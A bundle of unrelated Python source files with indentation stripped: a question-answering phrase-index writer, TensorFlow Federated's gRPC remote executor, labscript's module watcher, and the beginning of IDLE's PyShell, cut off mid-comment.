for meta in metadata[key]:
for number in meta:
num_str = "%.1f" % number
if float(num_str) not in b_quant_stat:
b_quant_stat[float(num_str)] = 0
b_quant_stat[float(num_str)] += 1
'''
metadata[key] = float_to_int8(metadata[key], dense_offset, dense_scale)
# metadata[key] = float_to_int4(metadata[key])
'''
if key == 'start':
for meta in metadata[key]:
for number in meta:
num_str = "%d" % number
if int(num_str) not in quant_stat:
quant_stat[int(num_str)] = 0
quant_stat[int(num_str)] += 1
'''
return metadata
def pool_func(item):
metadata_ = get_metadata(*item[:-1])
if 'start' in metadata_:
metadata_ = filter_metadata(metadata_, item[-1])
return metadata_
def write_phrases(all_examples, all_features, all_results, max_answer_length, do_lower_case, tokenizer, hdf5_path,
filter_threshold, verbose_logging, dense_offset=None, dense_scale=None, has_title=False):
assert len(all_examples) > 0
id2feature = {feature.unique_id: feature for feature in all_features}
id2example_ = {id_: all_examples[id2feature[id_].example_index] for id_ in id2feature}
def add(inqueue_, outqueue_):
for item in iter(inqueue_.get, None):
# start_time = time()
args = list(item[:2]) + [
max_answer_length, do_lower_case, tokenizer, verbose_logging, has_title, filter_threshold
]
out = pool_func(args)
# print(f'in {time() - start_time:.1f} sec, {inqueue_.qsize()}')
outqueue_.put(out)
outqueue_.put(None)
def write(outqueue_):
with h5py.File(hdf5_path, 'a') as f:
while True:
metadata = outqueue_.get()
if metadata:
# start_time = time()
did = str(metadata['did'])
if did in f:
logger.info('%s exists; replacing' % did)
del f[did]
# logger.info('%s exists; skipping' % did)
# continue
dg = f.create_group(did)
dg.attrs['context'] = metadata['context']
dg.attrs['title'] = metadata['title']
if dense_offset is not None:
metadata = compress_metadata(metadata, dense_offset, dense_scale)
dg.attrs['offset'] = dense_offset
dg.attrs['scale'] = dense_scale
dg.create_dataset('start', data=metadata['start'])
dg.create_dataset('len_per_para', data=metadata['len_per_para'])
dg.create_dataset('start2end', data=metadata['start2end'])
dg.create_dataset('word2char_start', data=metadata['word2char_start'])
dg.create_dataset('word2char_end', data=metadata['word2char_end'])
dg.create_dataset('f2o_start', data=metadata['f2o_start'])
# print(f'out {time() - start_time:.1f} sec, {outqueue_.qsize()} ')
else:
break
features = []
results = []
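    # Producer/consumer pipeline: NUM_THREAD worker processes pull (features,
    # results) batches from inqueue, build phrase metadata, and push it to
    # outqueue; NUM_THREAD writer threads drain outqueue into the HDF5 file.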
inqueue = Queue(maxsize=50)
outqueue = Queue(maxsize=50)
NUM_THREAD = 10
in_p_list = [Process(target=add, args=(inqueue, outqueue)) for _ in range(NUM_THREAD)]
out_p_list = [Thread(target=write, args=(outqueue,)) for _ in range(NUM_THREAD)]
global id2example
id2example = id2example_
for in_p in in_p_list:
in_p.start()
for out_p in out_p_list:
out_p.start()
start_time = time()
for count, result in enumerate(tqdm(all_results, total=len(all_features))):
example = id2example[result.unique_id]
feature = id2feature[result.unique_id]
condition = len(features) > 0 and example.par_idx == 0 and feature.span_idx == 0
if condition:
in_ = (features, results)
inqueue.put(in_)
prev_ex = id2example[results[0].unique_id]
if prev_ex.doc_idx % 200 == 0:
logger.info(f'saving {len(features)} features from doc {prev_ex.title} (doc_idx: {prev_ex.doc_idx})')
logger.info(
'[%d/%d at %.1f second] ' % (count + 1, len(all_features), time() - start_time) +
'[inqueue, outqueue size: %d vs %d]' % (inqueue.qsize(), outqueue.qsize())
)
features = [feature]
results = [result]
else:
features.append(feature)
results.append(result)
in_ = (features, results)
inqueue.put(in_)
for _ in range(NUM_THREAD):
inqueue.put(None)
for in_p in in_p_list:
in_p.join()
for out_p in out_p_list:
out_p.join()
b_stats = collections.OrderedDict(sorted(b_quant_stat.items()))
stats = collections.OrderedDict(sorted(quant_stat.items()))
for k, v in b_stats.items():
print(k, v)
for k, v in stats.items():
print(k, v)
def write_filter(all_examples, all_features, all_results, tokenizer, hdf5_path, filter_threshold, verbose_logging, has_title=False):
assert len(all_examples) > 0
id2feature = {feature.unique_id: feature for feature in all_features}
id2example_ = {id_: all_examples[id2feature[id_].example_index] for id_ in id2feature}
def add(inqueue_, outqueue_):
for item in iter(inqueue_.get, None):
args = list(item[:2]) + [
None, None, tokenizer, verbose_logging, has_title, filter_threshold
]
out = pool_func(args)
outqueue_.put(out)
outqueue_.put(None)
def write(outqueue_):
with h5py.File(hdf5_path, 'a') as f:
while True:
metadata = outqueue_.get()
if metadata:
did = str(metadata['did'])
if did in f:
logger.info('%s exists; replacing' % did)
del f[did]
dg = f.create_group(did)
dg.attrs['title'] = metadata['title']
dg.create_dataset('filter_start', data=metadata['filter_start'])
dg.create_dataset('filter_end', data=metadata['filter_end'])
else:
break
features = []
results = []
inqueue = Queue(maxsize=50)
outqueue = Queue(maxsize=50)
NUM_THREAD = 10
in_p_list = [Process(target=add, args=(inqueue, outqueue)) for _ in range(NUM_THREAD)]
out_p_list = [Thread(target=write, args=(outqueue,)) for _ in range(NUM_THREAD)]
global id2example
id2example = id2example_
for in_p in in_p_list:
in_p.start()
for out_p in out_p_list:
out_p.start()
start_time = time()
for count, result in enumerate(tqdm(all_results, total=len(all_features))):
example = id2example[result.unique_id]
feature = id2feature[result.unique_id]
condition = len(features) > 0 and example.par_idx == 0 and feature.span_idx == 0
if condition:
# print('put')
# in_ = (id2example_, features, results)
in_ = (features, results)
inqueue.put(in_)
# import pdb; pdb.set_trace()
prev_ex = id2example[results[0].unique_id]
if prev_ex.doc_idx % 200 == 0:
logger.info(f'saving {len(features)} features from doc {prev_ex.title} (doc_idx: {prev_ex.doc_idx})')
logger.info(
'[%d/%d at %.1f second] ' % (count + 1, len(all_features), time() - start_time) +
'[inqueue, outqueue size: %d vs %d]' % (inqueue.qsize(), outqueue.qsize())
)
features = [feature]
results = [result]
else:
features.append(feature)
results.append(result)
in_ = (features, results)
inqueue.put(in_)
for _ in range(NUM_THREAD):
inqueue.put(None)
for in_p in in_p_list:
in_p.join()
for out_p in out_p_list:
out_p.join()
def get_question_results(question_examples, query_eval_features, question_dataloader, device, model, batch_size):
id2feature = {feature.unique_id: feature for feature in query_eval_features}
id2example = {id_: question_examples[id2feature[id_].example_index] for id_ in id2feature}
def to_numpy(tensor):
return tensor.detach().cpu().numpy()
for batch in tqdm(question_dataloader, desc="Evaluating", disable=True):
model.eval()
batch = tuple(t.to(device) for t in batch)
assert len(batch) == 4
with torch.no_grad():
inputs = {
"input_ids_": batch[0],
"attention_mask_": batch[1],
"token_type_ids_": batch[2],
"return_query": True,
}
feature_indices = batch[3]
assert len(feature_indices.size()) > 0
# feature_indices.unsqueeze_(0)
outputs = model(**inputs)
for i, feature_index in enumerate(feature_indices):
eval_feature = query_eval_features[feature_index.item()]
unique_id = int(eval_feature.unique_id)
output = [
to_numpy(output[i]) if type(output) != dict else {k: to_numpy(v[i]) for k, v in output.items()}
for output in outputs
]
if len(output) != 2:
raise NotImplementedError
else:
start_vec, end_vec = output
result = QuestionResult(
unique_id,
qas_id=id2example[unique_id].qas_id,
input_ids=id2feature[unique_id].input_ids_,
start_vec=start_vec,
end_vec=end_vec,
)
yield result
def get_cq_results(examples, eval_features, dataloader, device, model, batch_size):
id2feature = {feature.unique_id: feature for feature in eval_features}
id2example = {id_: examples[id2feature[id_].example_index] for id_ in id2feature}
def to_numpy(tensor):
return tensor.detach().cpu().numpy()
def to_list(tensor):
return tensor.detach().cpu().tolist()
for batch in tqdm(dataloader, desc="Evaluating", disable=True):
model.eval()
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = {
"input_ids": batch[0],
"attention_mask": batch[1],
"token_type_ids": batch[2],
"input_ids_": batch[6],
"attention_mask_": batch[7],
"token_type_ids_": batch[8],
"title_offset": batch[9],
}
feature_indices = batch[3]
assert len(feature_indices.size()) > 0
outputs = model(**inputs)
for i, feature_index in enumerate(feature_indices):
eval_feature = eval_features[feature_index.item()]
unique_id = int(eval_feature.unique_id)
output = [to_list(output[i]) for output in outputs]
if len(output) != 4:
raise NotImplementedError
else:
start_logits, end_logits, sft_logits, eft_logits = output
result = SquadResult(
unique_id,
start_logits=start_logits,
end_logits=end_logits,
sft_logits=sft_logits,
eft_logits=eft_logits,
)
yield result
def get_bertqa_results(examples, eval_features, dataloader, device, model, batch_size):
id2feature = {feature.unique_id: feature for feature in eval_features}
id2example = {id_: examples[id2feature[id_].example_index] for id_ in id2feature}
def to_numpy(tensor):
return tensor.detach().cpu().numpy()
def to_list(tensor):
return tensor.detach().cpu().tolist()
for batch in tqdm(dataloader, desc="Evaluating", disable=True):
model.eval()
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
inputs = {
"input_ids": batch[0],
"attention_mask": batch[1],
"token_type_ids": batch[2],
}
feature_indices = batch[3]
assert len(feature_indices.size()) > 0
outputs = model[0](**inputs)
outputs = model[1](outputs[0]).split(dim=2, split_size=1)
for i, feature_index in enumerate(feature_indices):
eval_feature = eval_features[feature_index.item()]
unique_id = int(eval_feature.unique_id)
output = [to_list(output[i].squeeze(1)) for output in outputs]
if len(output) != 2:
raise NotImplementedError
else:
start_logits, end_logits = output
result = SquadResult(
unique_id,
start_logits=start_logits,
end_logits=end_logits,
sft_logits=start_logits,
eft_logits=end_logits,
)
yield result
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import queue
import threading
from typing import Mapping
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import structure
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_serialization
from tensorflow_federated.python.core.impl.executors import executor_value_base
from tensorflow_federated.python.core.impl.types import placement_literals
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_lock = threading.Lock()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
self._stream_error = None
self._request_num = 0
self._request_num_lock = threading.Lock()
def request_iter():
"""Iterator that blocks on the request Queue."""
request = self._request_queue.get()
while request is not None:
yield request
request = self._request_queue.get()
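    # Note: close() puts a `None` sentinel on the request queue, which ends
    # request_iter() above and lets gRPC close the request side of the stream.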
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
if response.WhichOneof('response') is None:
# TODO(b/175927125): We currently pass an empty response in some
# error cases and pass a GRPC error back via the ServicerContext in
# some others. Unify this error-passing.
raise execution_context.RetryableError(
'Unknown error on the service side.')
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except Exception as error: # pylint: disable=broad-except
logging.exception('Error calling remote executor: %s', error)
if _is_retryable_grpc_error(error):
logging.exception('gRPC error is retryable')
error = execution_context.RetryableError(error)
with self._response_event_lock:
self._stream_error = error
for _, response_event in self._response_event_dict.items():
if not response_event.isSet():
response_event.response = error
response_event.set()
self._stream_closed_event.set()
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
py_typecheck.check_type(response_event, threading.Event)
with self._request_num_lock:
seq = self._request_num
self._request_num += 1
with self._response_event_lock:
if self._stream_error is not None:
logging.debug('Stream failed before msg enqueued')
logging.debug('%s', self._stream_error)
response_event.response = self._stream_error
response_event.set()
else:
request.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
request.WhichOneof('request'), seq)
self._response_event_dict[seq] = response_event
        # Enqueue the request; the response is delivered later via the Event registered above.
self._request_queue.put(request)
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
@tracing.trace(span=True)
def _request(rpc_func, request):
"""Populates trace context and reraises gRPC errors with retryable info."""
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
logging.debug('Clearing executor state on server.')
self._clear_executor()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def set_cardinalities(
self, cardinalities: Mapping[placement_literals.PlacementLiteral, int]):
serialized_cardinalities = executor_serialization.serialize_cardinalities(
cardinalities)
request = executor_pb2.SetCardinalitiesRequest(
cardinalities=serialized_cardinalities)
if self._bidi_stream is None:
_request(self._stub.SetCardinalities, request)
else:
await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(set_cardinalities=request))
return
@tracing.trace(span=True)
def _clear_executor(self):
request = executor_pb2.ClearExecutorRequest()
try:
_request(self._stub.ClearExecutor, request)
except (grpc.RpcError, execution_context.RetryableError):
logging.debug('RPC error caught during attempt to clear state on the '
'server; this likely indicates a broken connection, and '
'therefore there is no state to clear.')
return
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_serialization.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = structure.from_container(elements)
proto_elem = []
type_elem = []
for k, v in structure.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_serialization.deserialize_value(response.value)
return value
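# Minimal usage sketch for RemoteExecutor above (assumed, not part of the
# original module; the address is a placeholder):
#
#   channel = grpc.insecure_channel('localhost:8000')
#   executor = RemoteExecutor(channel, rpc_mode='STREAMING')
#   ...  # hand the executor to an executor stack / execution context
#   executor.close()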
|
modulewatcher.py
|
#####################################################################
# #
# modulewatcher.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
import sys
import threading
import time
import os
import imp
import site
import distutils.sysconfig
# Directories in which the standard library and installed packages may be located.
# Modules in these locations will be whitelisted:
PKGDIRS = [
distutils.sysconfig.get_python_lib(plat_specific=True, standard_lib=True),
distutils.sysconfig.get_python_lib(plat_specific=True, standard_lib=False),
distutils.sysconfig.get_python_lib(plat_specific=False, standard_lib=True),
distutils.sysconfig.get_python_lib(plat_specific=False, standard_lib=False),
site.getusersitepackages(),
]
PKGDIRS += site.getsitepackages()
PKGDIRS = set(PKGDIRS)
class ModuleWatcher(object):
def __init__(self, debug=False):
self.debug = debug
# A lock to hold whenever you don't want modules unloaded:
self.lock = threading.Lock()
# The whitelist is the list of names of currently loaded modules:
self.whitelist = set(sys.modules)
self.meta_whitelist = list(sys.meta_path)
self.modified_times = {}
self.main = threading.Thread(target=self.mainloop)
self.main.daemon = True
self.main.start()
def mainloop(self):
while True:
time.sleep(1)
with self.lock:
# Acquire the import lock so that we don't unload modules whilst an
                # import is in progress:
imp.acquire_lock()
try:
if self.check():
self.unload()
finally:
# We're done mucking around with the cached modules, normal imports
# in other threads may resume:
imp.release_lock()
def check(self):
unload_required = False
# Look through currently loaded modules:
for name, module in sys.modules.copy().items():
            # Look only at the modules not in the whitelist:
if name not in self.whitelist:
# Only consider modules which have a non-None __file__ attribute, are
# .py (or .pyc) files (no C extensions or builtin modules), that exist
# on disk, and that aren't in standard package directories. Add modules
# we won't consider to the whitelist so that we don't consider them in
# future calls.
if getattr(module, '__file__', None) is None:
self.whitelist.add(name)
continue
module_file = module.__file__
if module_file.endswith('.pyc'):
module_file = os.path.splitext(module_file)[0] + '.py'
if not module_file.endswith('.py') or not os.path.exists(module_file):
self.whitelist.add(name)
continue
if any(module_file.startswith(s + os.path.sep) for s in PKGDIRS):
# Whitelist modules in package install directories:
self.whitelist.add(name)
continue
# Check and store the modified time of the .py file:
modified_time = os.path.getmtime(module_file)
previous_modified_time = self.modified_times.setdefault(
name, modified_time
)
self.modified_times[name] = modified_time
if modified_time != previous_modified_time:
# A module has been modified! Unload all modules not in the
# whitelist:
unload_required = True
message = (
'%s modified: all non-whitelisted modules ' % module_file
+ 'will be reloaded next run.\n'
)
sys.stderr.write(message)
return unload_required
def unload(self):
if self.debug:
print("ModuleWatcher: whitelist is:")
for name in sorted(self.whitelist):
print(" " + name)
print("\nModuleWatcher: modules unloaded:")
for name in sorted(sys.modules):
if name not in self.whitelist:
# This unloads a module. This is slightly more general than
# reload(module), but has the same caveats regarding existing
# references. This also means that any exception in the import will
# occur later, once the module is (re)imported, rather than now
# where catching the exception would have to be handled differently.
del sys.modules[name]
if name in self.modified_times:
del self.modified_times[name]
if self.debug:
print(" " + name)
# Replace sys.meta_path with the cached whitelist, effectively removing all
# since-added entries from it. Replacement is done in-place in case other
# code holds references to sys.meta_path, and to preserve order, since order
# is relevant.
sys.meta_path[:] = self.meta_whitelist
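# Usage sketch -- a minimal, hypothetical illustration: create one
# ModuleWatcher per process and hold its lock while executing code that
# imports user modules, so nothing is unloaded part-way through a run. The
# stdlib import below is only a stand-in for a user module.
if __name__ == '__main__':
    watcher = ModuleWatcher(debug=True)
    for _ in range(3):
        with watcher.lock:
            # Imports made while holding the lock cannot be unloaded until it
            # is released; afterwards, any modified non-whitelisted module is
            # dropped from sys.modules on the next one-second check.
            import json  # stand-in for user code being (re)imported
        time.sleep(2)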
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import macosxSupport
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno):
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename, lineno))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
line = linecache.getline(filename, lineno).strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(which destroys them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
